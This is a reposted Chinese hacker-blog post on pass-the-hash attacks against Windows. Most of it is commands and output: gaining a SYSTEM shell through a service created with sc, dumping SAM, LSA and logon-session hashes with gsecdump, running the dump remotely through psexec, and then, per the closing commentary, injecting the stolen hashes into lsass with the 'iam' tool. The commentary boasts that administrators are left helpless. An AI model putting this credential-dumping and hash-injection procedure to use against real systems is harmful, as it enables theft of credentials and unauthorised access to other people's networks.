导航

心动吧黑客BLOG

自发研究:须要多维思想而且要想不可能为可能的人才能做到

« 一个监视终端登陆的批处理文件[原创]明生使用笔记之Hash注入式攻击 »

HASH注入式攻击

文章作者:pt007[at]vip.sina.com

信息来源:邪恶八进制信息安全团队(www.eviloctal.com)

下载网址:

http://www.truesec.com/PublicSto ... tectCookieSupport=1



To get a DOS Prompt as NT system:



C:\>sc create shellcmdline binpath= "C:\WINDOWS\system32\cmd.exe /K start" type= own type= interact

[SC] CreateService SUCCESS



C:\>sc start shellcmdline

[SC] StartService FAILED 1053:



The service did not respond to the start or control request in a timely fashion.



C:\>sc delete shellcmdline

[SC] DeleteService SUCCESS



------------



Then in the new DOS window:



Microsoft Windows XP [Version 5.1.2600]

(C) Copyright 1985-2001 Microsoft Corp.



C:\WINDOWS\system32>whoami

NT AUTHORITY\SYSTEM



C:\WINDOWS\system32>gsecdump -h

gsecdump v0.6 by Johannes Gumbel (johannes.gumbel@truesec.se)

usage: gsecdump [options]



options:

-h [ --help ] show help

-a [ --dump_all ] dump all secrets

-l [ --dump_lsa ] dump lsa secrets

-w [ --dump_wireless ] dump microsoft wireless connections

-u [ --dump_usedhashes ] dump hashes from active logon sessions

-s [ --dump_hashes ] dump hashes from SAM/AD



Although I like to use:



PsExec v1.83 - Execute processes remotely

Copyright (C) 2001-2007 Mark Russinovich

Sysinternals - www.sysinternals.com



C:\>psexec \\COMPUTER -u user -p password -s -f -c gsecdump.exe -u >Active-HASH.TXT



to get the hashes from active logon sessions of a remote system.



These are a lot better than getting a cachedump of the Cached Credentials because these hashes are LMHashes that can be easily broken with Rainbow Tables.



提示一下,可以使用pshtools工具包中的iam,把刚才使用gsecdump抓取出来HASH信息导入本地的lsass进程,来实现hash注入式攻击,还是老外厉害,这下管理员有得忙了,ARP欺骗的时候获得的LM/NThash,还有gethash获得的,其实根本不用破解密码,这个就是利用工具了,原文说的好,不管密码是设置4位还是127位,只要有了hash,100%就能搞定了.

原文出处:http://truesecurity.se/blogs/mur ... -text-password.aspx

 

原创文章如转载,请注明:转载自心动吧黑客BLOG [ http://www.abcxd.com/abcxd/ ]

本文链接地址:http://www.abcxd.com/abcxd/abcxdArticle/setou/205/

  • 相关文章:

发表评论:

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。

黑客榜之本月排行

搜索内容

日历

Copyright ⊙ 2004-2009 心动吧 UrL:ABCXD.CoM All RiGhts Reserved